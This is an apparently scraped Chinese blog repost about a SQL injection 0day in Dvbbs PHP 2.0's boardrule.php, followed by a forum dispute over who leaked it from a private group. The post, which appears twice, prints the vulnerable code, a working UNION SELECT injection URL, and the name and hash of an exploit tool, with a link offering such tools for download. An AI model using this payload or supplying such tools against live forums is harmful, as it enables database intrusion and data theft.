由Dvbbs PHP 0day引发的争论
生活随笔
收集整理的這篇文章主要介紹了
由Dvbbs PHP 0day引发的争论
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
由Dvbbs PHP 0day引發(fā)的爭論 昨天剛剛得到Dvbbs PHP 0day 的資料,看來還是晚了,今天無意間發(fā)現(xiàn)了有趣的事情,所以就給大家貼出來。呵呵
漏洞給大家播報下
================================================================
Dvbbs PHP 0day
影響版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息來源:零客網(wǎng)安 [url]www.0kee.com[/url]
--------------------分割JJ----------------------
相關(guān)代碼:
function brule() {
??? global $dv,$db,$boardid,$lang,$groupboardid;
??? $groupboardid=$_GET['groupboardid'];
??? if(!empty($_GET['groupboardid'])){
??????? $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");??
??? }
??? else{
??????? $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");???
??? }
直接獲得變量groupboardid,不為空就直接帶入查詢導(dǎo)致注入。
測試:[url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version ()/*
利用工具 dvbbs_php2.0_fucker_.exe? MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
=========================================================================================
(應(yīng)該是0DAY的發(fā)現(xiàn)者說的,還有可能是零客的老大 下稱作者)題外話:這個0day作為內(nèi)部信息我只在10號那天在群共享里發(fā)了。
之前sniperhg本打算在清明節(jié)時發(fā)出來,沒想到今天下午無意中在鬼仔的blog里看到了這個。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版權(quán)信息去掉了之外跟我在群里發(fā)的txt幾乎一個字都不帶差的。居然說是揀的。 東西發(fā)就發(fā)了,無所謂,也不是多好的東西。
但是就這件事,我非常不爽。
是誰泄露的,我早晚會查個水落石出。 論壇斑竹: ? 跟帖。。。 我X那個人。 鬼仔也不厚道~ 鬼仔: 。。。。。。
不是我不厚道,我是沒想那么多就發(fā)出來了。 不好意思。
作者: ? 說實話
一定得查查誰泄露的
和鬼仔沒關(guān)系
感覺自己內(nèi)部群里不應(yīng)該出現(xiàn)會泄露信息的人
我一直很相信自己人的
現(xiàn)在也不例外 鬼仔:
關(guān)于把版權(quán)信息去掉的問題,是我確實不知道是你們這里的,我把你們版權(quán)信息加上了。 ? 內(nèi)部成員: ? 你還真會撿啊???/ 鬼仔: ? 我已經(jīng)道歉了,沒必要這樣了吧? 作者:
沒意見
看看蟑螂有何意見和想法 游客: 不是內(nèi)部泄露就是馬化騰個J8@! 小蟑螂:
事都過去了。
但是我希望你能告訴是誰給你的。
OK的話就PM給我。不行就當(dāng)我沒說。
我不希望這個人是我群里的。
? 呵呵,如果能聯(lián)想到一起,那么就更有趣了,最后總結(jié)一句話,什么事情就怕出內(nèi)奸,
?
關(guān)于發(fā)布的ODAY工具,網(wǎng)上的大都不能用 大家可以到?[url]http://www.520jsj.com[/url]上去下載,也可以到上面的官方去下載哦。 ?
漏洞給大家播報下
================================================================
Dvbbs PHP 0day
影響版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息來源:零客網(wǎng)安 [url]www.0kee.com[/url]
--------------------分割JJ----------------------
相關(guān)代碼:
function brule() {
??? global $dv,$db,$boardid,$lang,$groupboardid;
??? $groupboardid=$_GET['groupboardid'];
??? if(!empty($_GET['groupboardid'])){
??????? $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");??
??? }
??? else{
??????? $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");???
??? }
直接獲得變量groupboardid,不為空就直接帶入查詢導(dǎo)致注入。
測試:[url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version ()/*
利用工具 dvbbs_php2.0_fucker_.exe? MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
=========================================================================================
(應(yīng)該是0DAY的發(fā)現(xiàn)者說的,還有可能是零客的老大 下稱作者)題外話:這個0day作為內(nèi)部信息我只在10號那天在群共享里發(fā)了。
之前sniperhg本打算在清明節(jié)時發(fā)出來,沒想到今天下午無意中在鬼仔的blog里看到了這個。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版權(quán)信息去掉了之外跟我在群里發(fā)的txt幾乎一個字都不帶差的。居然說是揀的。 東西發(fā)就發(fā)了,無所謂,也不是多好的東西。
但是就這件事,我非常不爽。
是誰泄露的,我早晚會查個水落石出。 論壇斑竹: ? 跟帖。。。 我X那個人。 鬼仔也不厚道~ 鬼仔: 。。。。。。
不是我不厚道,我是沒想那么多就發(fā)出來了。 不好意思。
作者: ? 說實話
一定得查查誰泄露的
和鬼仔沒關(guān)系
感覺自己內(nèi)部群里不應(yīng)該出現(xiàn)會泄露信息的人
我一直很相信自己人的
現(xiàn)在也不例外 鬼仔:
關(guān)于把版權(quán)信息去掉的問題,是我確實不知道是你們這里的,我把你們版權(quán)信息加上了。 ? 內(nèi)部成員: ? 你還真會撿啊???/ 鬼仔: ? 我已經(jīng)道歉了,沒必要這樣了吧? 作者:
沒意見
看看蟑螂有何意見和想法 游客: 不是內(nèi)部泄露就是馬化騰個J8@! 小蟑螂:
事都過去了。
但是我希望你能告訴是誰給你的。
OK的話就PM給我。不行就當(dāng)我沒說。
我不希望這個人是我群里的。
? 呵呵,如果能聯(lián)想到一起,那么就更有趣了,最后總結(jié)一句話,什么事情就怕出內(nèi)奸,
?
關(guān)于發(fā)布的ODAY工具,網(wǎng)上的大都不能用 大家可以到?[url]http://www.520jsj.com[/url]上去下載,也可以到上面的官方去下載哦。 ?
轉(zhuǎn)載于:https://blog.51cto.com/blacksnow/65986
總結(jié)
以上是生活随笔為你收集整理的由Dvbbs PHP 0day引发的争论的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java已被弱化签名,高效Java第四十
- 下一篇: python函数的继承_Python 继